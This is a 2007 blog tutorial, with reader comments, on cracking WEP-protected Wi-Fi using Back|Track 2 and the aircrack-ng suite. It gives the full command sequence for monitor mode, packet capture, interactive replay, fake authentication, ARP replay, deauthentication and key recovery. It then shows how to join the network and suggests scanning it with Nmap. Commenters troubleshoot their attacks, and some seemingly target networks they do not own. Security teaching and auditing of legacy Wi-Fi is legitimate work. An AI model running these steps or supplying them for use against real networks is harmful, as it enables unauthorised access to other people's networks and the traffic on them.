Hacking WEP With Fake Authentication + Video
January 8th, 2007 - By: Anthony D.
Comments (18) |
del.icio.us |
EMail Post | 
Print Post
Video Demonstration: Hacking WEP
This is a tutorial on how to crack Wired Equivalent Privacy (WEP), whether it is 64-bit or 128-bit. Depending on whether there are clients connected to your Access Point (AP) or not will decide which method you need to use to generate wireless traffic. If you are looking for a Linux Distribution that contains all of the tools needed for this, I would highly recommend Back|Track 2. Not only does it contain hundreds of open source tools, but it is also based on the Slax Live CD, which has excellent modularity. To sniff for wireless networks and capture packets you can use a variety of different applications, but the most widely used are Airodump and Kismet. I would suggest using Airodump since it comes in the Aircrack Suite and is what I will be using in this tutorial.
I will describe two different methods of generating wireless traffic. The first assumes that there is at least one client connected to the AP and the second assumes that there are no clients connected to the AP. The first method works by capturing a packet that is being sent from the client you are sniffing traffic from to the AP. Your machine will then send that packet to the AP hundreds of times a second in order to rapidly generate wireless traffic. The packet that you sniff must have an Initialization Vector (IV) at the beginning of the packet, which is a 24-bit block that initializes the encryption. The second method works by sending fake authentication packets to the AP every thirty seconds. Once you are authenticated, you then send Address Resolution Protocol (ARP) requests to the AP hundreds of times a second while deauthenticating and reauthenticating yourself.
Now, let us get started. I'm going to assume that you have a laptop or desktop with a wireless card capable of injecting packets and have Back|Track 2 running. Enter in your user as root with the password toor. Then run xconf to configure the Graphical User Interface (GUI) for your video card and startx to start KDE. Once you are in KDE, open a console and enter in iwconfig to make sure that Back|Track 2 has detected your wireless card. The output will vary depending on your wireless card and driver. My output is as follows:
lo no wireless extensions.
eth0 no wireless extensions.
ath0 IEEE 802.11g ESSID:"Linksys"
Mode:Managed Frequency:2.442 GHz Access Point: 00:06:25:9A:50:C8
Bit Rate:54 Mb/s Tx-Power:18 dBm Sensitivity=187/255
Retry min limit:7 RTS thr:off
Power Management:off
Link Quality=54/100 Signal level=39/100 Noise level=1/100
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
sit0 no wireless extensions.
If Back|Track 2 did not detect your wireless card you may try loading different drivers or manually downloading and installing them yourself. Now let us set our wireless card to Monitor mode, which will enable us to discover Access Points, sniff wireless traffic, and inject packets. Depending on your wireless card and driver you may have to use either the first set or second set of commands. Also, throughout the tutorial you may have to change the wireless interface in the commands, such as ath0 to wlan0, and so on. The commands are as follows:
ifconfig ath0 down
iwconfig ath0 mode monitor channel 6
ifconfig ath0 up
- or -
ifconfig ath0 down
wlanconfig ath0 destroy
wlanconfig ath0 create wlandev wifi0 wlanmode monitor
ifconfig ath0 up
Now that your wireless card is set to Monitor mode we can start Airodump. Airodump will allow us to sniff wireless traffic and log it to a file, which we will later run through Aircrack. The following command will start Airodump on channel six, write the captured packets to output-01.ivs, and run on the wireless interface ath0. If you would prefer to scan all channels and all frequencies, you can add the --abg option into the command before the wireless interface. If you do opt to do to that, be sure to exit Airodump once you have found the channel the AP is on. Run Airodump again and set the channel to that of the AP, this way the AP stays on that frequency. The command is as follows:
airodump-ng --channel 6 --write output --ivs ath0
Now that Airodump is running on that console we need to open a new tab or console. Once that is done we will start Aireplay, which is also a tool found in the Aircrack Suite. This is the point where you must use either the first or second method. If the AP has at least one client connected, use the first method. If the first method does not work or there are no clients connected to the AP, use the second method.
First Method:
If the AP has at least one client connected, you want to use this method. The following command will send five-hundred and twelve packets every second from the clients Media Access Control (MAC) Address of 00:06:25:B3:D6:E2 to the AP with the MAC Address of 00:06:25:9A:50:C8 on the wireless interface ath0. Since the captured packet has the IV at the beginning and Aireplay is sending the packet to the AP with the clients MAC Address, the AP will allow the traffic to be passed through. Edit the AP MAC Address, client MAC Address, and wireless interface to suite your needs. The command is as follows:
aireplay-ng --interactive -b 00:06:25:9A:50:C8 -h 00:06:25:B3:D6:E2 -x 512 ath0
Once Aireplay successfully finds a packet it will prompt you to either use that packet or search for a new packet. If the packets source is the Broadcast Address or the clients MAC Address and the destination is the AP, odds are it will work. You may have to try many packets before you find one that generates wireless traffic, but eventually you should find one. That's all for the first method. If Airodump is rapidly capturing data then you may move on to the Aircrack portion of this tutorial. Once again, if the first method did not work then you may try the second method, but you have a better chance of success if there is at least one client connected.
Second Method:
If the first method does not work or there are no clients connected to the AP, you want to use this method. The first command will fake authenticate every thirty seconds using the fake client MAC Address 00:06:25:C1:E5:37 to the AP with the MAC Address of 00:06:25:9A:50:C8 and Service Set Identifier (SSID) of Linksys on the wireless interface ath0. Edit the SSID, AP MAC Address, fake client MAC Address, and wireless interface to suite your needs. The list of commands must be run in order for them to work properly. The first command is as follows:
aireplay-ng --fakeauth 30 -e Linksys -a 00:06:25:9A:50:C8 -h 00:06:25:C1:E5:37 ath0
The second command will send five-hundred and twelve ARP requests every second using the fake client MAC Address of 00:06:25:C1:E5:37 to the AP with the MAC Address of 00:06:25:9A:50:C8 on the wireless interface ath0. The second command is as follows:
aireplay-ng --arpreplay -b 00:06:25:9A:50:C8 -h 00:06:25:C1:E5:37 -x 512 ath0
The third command will send five deauthentication packets using the fake client MAC Address of 00:06:25:C1:E5:37 to the AP with the MAC Address of 00:06:25:9A:50:C8 on the wireless interface ath0. The third command is as follows:
aireplay-ng --deauth 5 -a 00:06:25:9A:50:C8 -c 00:06:25:C1:E5:37 ath0
From this point on it does not matter which method you used to generate wireless traffic, as long as the data is rapidly increasing in Airodump. Usually a 64-bit WEP key can be brute forced with about 250,000 packets of data and a 128-bit WEP key can be brute forced with about 500,000 packets of data. Now that we have Airodump capturing wireless packets and Aireplay generating wireless traffic, we can start Aircrack to begin the process of brute forcing the WEP key. The following command will run Aircrack on output-01.ivs and search for the AP MAC Address of 00:06:25:9A:50:C8 using the default fudge factor of two. When we ran Airodump, we set the filename as output.ivs, but because Airodump automatically increments the filename, it will start off as output-01.ivs and so on. A couple of other options are -f for the fudge factor or -n for the WEP key length. The fudge factor will increase or decrease how thorough the brute force is, but the higher fudge factor the longer it takes. The default fudge factor is two, but if you have a sufficient amount of data captured, such as 750,000 packets, and the WEP key is still not cracked after a few minutes then you may want to up the fudge factor to four or run two instances of Aircrack using different fudge factors. Usually you do not have to set the WEP key length, but if you do happen to know it then setting it may speed up the brute force. The most common WEP key lengths will be 64-bit or 128-bit. The command is as follows:
aircrack-ng -b 00:06:25:9A:50:C8 output-01.ivs
Once Airodump has captured enough data and Aircrack has brute forced the key, Aircrack will state Key Found and display the WEP key. The time it will take Aircrack to brute force the WEP key depends on the WEP key length, how much data was captured, and the processing power of your laptop or desktop. I have had times where I captured over one million packets and ran two instances of Aircrack using fudge factors of two and four, but it still took thirty minutes to brute force the key. Then again, i have had times where i captured less than 200,000 packets and brute forced the WEP key in under five minutes. The average time it should take to brute force an average WEP key should be about ten to fifteen minutes. My Aircrack output is as follows:
Key Found! [ 40:39:19:87:08 ]
Now we must connect to the AP using the supplied WEP key. The following commands will set your wireless card to Managed mode, connect to an AP with the SSID of Linksys, use channel six, and 40:39:19:87:08 as the WEP key. Once again depending on your wireless card and driver you may have to use either the first set or second set of commands. Also, if you would like to connect to the AP from Windows you must take out the colons in the WEP key. The commands are as follows:
ifconfig ath0 down
iwconfig ath0 mode managed essid Linksys channel 6 key 40:39:19:87:08
ifconfig ath0 up
- or -
ifconfig ath0 down
wlanconfig ath0 destroy
wlanconfig ath0 create wlandev wifi0 wlanmode sta
iwconfig ath0 essid Linksys channel 6 key 40:39:19:87:08
ifconfig ath0 up
Now we should be connected to the AP, but we need to be assigned an Internet Protocol (IP) Address. We will use the Dynamic Host Configuration Protocol (DHCP) to be leased an IP Address with a Domain Name System (DNS) Server. The following command will run the DHCP Client on the wireless interface ath0. The command is as follows:
dhcpcd ath0
If the AP or Router is not running DHCP we can manually set the IP Address, Subnet Mask, Default Gateway, and DNS Server. The following commands will assign the wireless interface ath0 an IP Address of 192.168.1.105, with a Subnet Mask of 255.255.255.0, a Default Gateway of 192.168.1.1, and write the DNS Server 4.2.2.1 to /etc/resolv.conf. The commands are as follows:
ifconfig ath0 down
ifconfig ath0 192.168.1.105 netmask 255.255.255.0
ifconfig ath0 up
route add default gw 192.168.1.1 ath0
echo nameserver 4.2.2.1 > /etc/resolv.conf
Finally, we test our connectivity to make sure that we are successfully connected to the AP and Internet. The command is as follows:
ping cyber-knowledge.net
The output of that command should be as follows:
PING cyber-knowledge.net (66.79.165.146) 56(84) bytes of data.
64 bytes from techreads.cyber-knowledge.net (66.79.165.146): icmp_seq=1 ttl=48 time=78.6 ms
64 bytes from techreads.cyber-knowledge.net (66.79.165.146): icmp_seq=2 ttl=48 time=77.6 ms
64 bytes from techreads.cyber-knowledge.net (66.79.165.146): icmp_seq=3 ttl=48 time=77.6 ms
--- cyber-knowledge.net ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2014ms
If everything went as planned then you should be connected to the AP and Internet. After that it is up to you to decide what you want to do, but I would suggest running Nmap to discover what is on the network. If you would like to view a video demonstration of this tutorial you can find it here. Also, if you do use this tutorial, please comment on how your experience with it went. Have a great time and remember, be responsible.
Resources:
Hacking WEP
Aircrack Suite
Back|Track 2
Kismet
Nmap
Slax Live CD
1. newb | March 7th, 2007 @ 7:13 AM |
+0
Best tutorial I’ve found. Simple, concise, current and it works! And the video to boot. Love your work
2. kav | March 18th, 2007 @ 11:25 PM |
+0
how can you fake your IP? i use the second method and when i input a fake IP, it returns a message saying ” Notice: got a deauth/disassoc packet. Is the source MAC associated ?”. i re-associate it but nothing happens and all the commands hung. What can i do? Is the fake IP a random one?
3. Anthony D. | March 21st, 2007 @ 3:07 AM |
+0
The only part an Internet Protocol (IP) Address is needed is when you have actually cracked the Key to the Access Point (AP) and are ready to connect. In either method you use a Media Access Control (MAC) Address, which is permanently fixated on your Network Interface Card (NIC). Aireplay is using the spoofed MAC Address to send to the AP, technically you can use any MAC Address you prefer as long as it is Hexadecimal. When you have cracked the Key to the AP, then you should use DHCP or configure your IP manually. DHCP will usually work, but on a network without DHCP you may have to manually configure it. Normally a home network will be 192.168.1.1 or 192.168.0.1, but almost always the Subnet Mask will be 255.255.255.0 as in Class C. I hope this helps. If not, post a reply comment and I will try to steer you in the right direction.
4. Alan | May 22nd, 2007 @ 4:49 PM |
+0
Worked for me w/my linksys WUSB54GC. I used method one, but couldn’t find an appropriate packet; method two worked in about ten whole minutes. Only oddity was that iwconfig wanted my adapter UP (not down) before it would put it into monitor mode. Seemed strange to me, but maybe this was because it had already associated itself with another network? Anyway, awesome, it works, etc.
5. cam | June 17th, 2007 @ 9:14 PM |
+0
I cannot seem to be able to generate enough IVs. I am trying to crack a wep from an AP that recently had a client. I was able to gather a packet from the client before it went offline. I am sending the packet and in my airodump window I see the packet number going up but the data number is going up very very slowly. I have tried a fakeauth attack and it says sending authentication request about 5 or 6 times and comes back and says there is a problem. I have tried doing a arpreplay with aireplay and I can see the packets again going up, most of them are noted as being lost, and it says that I am receiving arp requests, yet again very slowly going up as well as the data. I have been doing this for over two hours, and I notice that in my aircrack window it says its tried over 2 million keys and has got like 11,000 IVs. Am i doing something wrong, or does the AP have a mac filter or blocking some other type of requests?
Thanks for the help
Cam
6. dewa_eheem | July 17th, 2007 @ 6:09 PM |
+0
how can we know the default Gateway????
should I Ask the administrator first????
if I was an admin, I wouldn’t set my IP with class C or without subnet
7. Noob | July 29th, 2007 @ 12:57 AM |
+0
I tried it and the authentication never went through for method 2…I’m recieving packets slow as a snail and at the rate I was going…it was gonna take me at least 4 days to collect 250 packets for 1 64 bit key
can someone give me some guidance?
8. Allan | October 18th, 2007 @ 5:44 AM |
+0
Any hardware required? Cause I am using an IPW2200BG, can it be done?
9. monomena | November 6th, 2007 @ 7:41 PM |
+0
i have a problem, when i try to authenticate, it starts but then it just stops, and says attack was unsuccessfull, posible reasons:
and it gives me some options but i check almost everyone so, i dont know what todo, sorry for the trouble but can someone help me?
10. CG | December 3rd, 2007 @ 1:32 PM |
+0
using the aircrack -z option should increase the cracking time significantly, i talked about it here:
carnal0wna...ck-ng.html
11. john | January 3rd, 2008 @ 10:56 AM |
+0
best beginners tut i have seen so far the only thing i would suggest is the -z option as state above although in order to do so you must not include –ivs in the first step because the ptw method will not accept the .iv only .cap
12. M4 | February 14th, 2008 @ 1:58 PM |
+0
Good job!
I’m confused with -h option. Is this my card mac address or any connected client mac address obtained with Kismet?
Other questions is about interactive attack in the fist method. Sould the packet contain the AP mac address as destination and the connected client (obtained with Kismet) as source?
Thanks.
13. peter | April 25th, 2008 @ 9:56 PM |
+0
Hi there,
i need your help becase i would understand a strange case:
0) AP seems to accepts any key of 10 legnth
1) I cracked a web key and i got the key (using air..mon..dump…reply..crack )
2) i tried dhcp and nothing
3) i fixed IP used by default by this vendor and mac 255.0.0.0 and nothing neither with 192.168.0.1
4) I made ping scanning for determining router IP and nothing. i did for all IP internal addresses and changing ip when needed!!!!
This is about a wireless named: WLAN_XX, Itried the same in 3 differents wlans WLAN_XX and the same result.
I have not yet tried to change the MAC, but theoretically if MAC filtering where active the AP should reject my packets
Does someone knows what’s going on?
Tnks
14. Gordon | May 12th, 2008 @ 1:01 AM |
+0
Hello
can wireless WEP still be hacked if there have never been clients connected?
15. Anthony D. | May 19th, 2008 @ 5:22 PM |
+0
Yes, WEP can still be broken on an AP even if clients have never been or are currently not connected. See method #2 where I discuss fake authentication and de-authentication.
16. Shawn | July 19th, 2008 @ 3:48 AM |
+0
I get this “Failed. Next try with 5000 IVs.” by the time I get to aircrack-ng. What is it and how do I go about it?
Thanks!
17. tghazali | September 5th, 2008 @ 12:15 AM |
+0
Hello, I’d really appreciate if you helped me out here :)
I’m trying here to crack my home wireless network WEP key with no clients connected.
I start airodump-ng, beacons keep increasing, but as soon as I associate successfully with fakeauth attack, beacons stop. After a while networks disappear from airodump, and running it again shows no networks.
Any ideas??
18. BluePlum | September 5th, 2008 @ 8:02 AM |
+0
Hey were do i find the second MAC address thats required?
aireplay-ng –interactive -b 00:06:25:9A:50:C8 -h ———> 00:06:25:B3:D6:E2 <——— -x 512 ath0
Leave a comment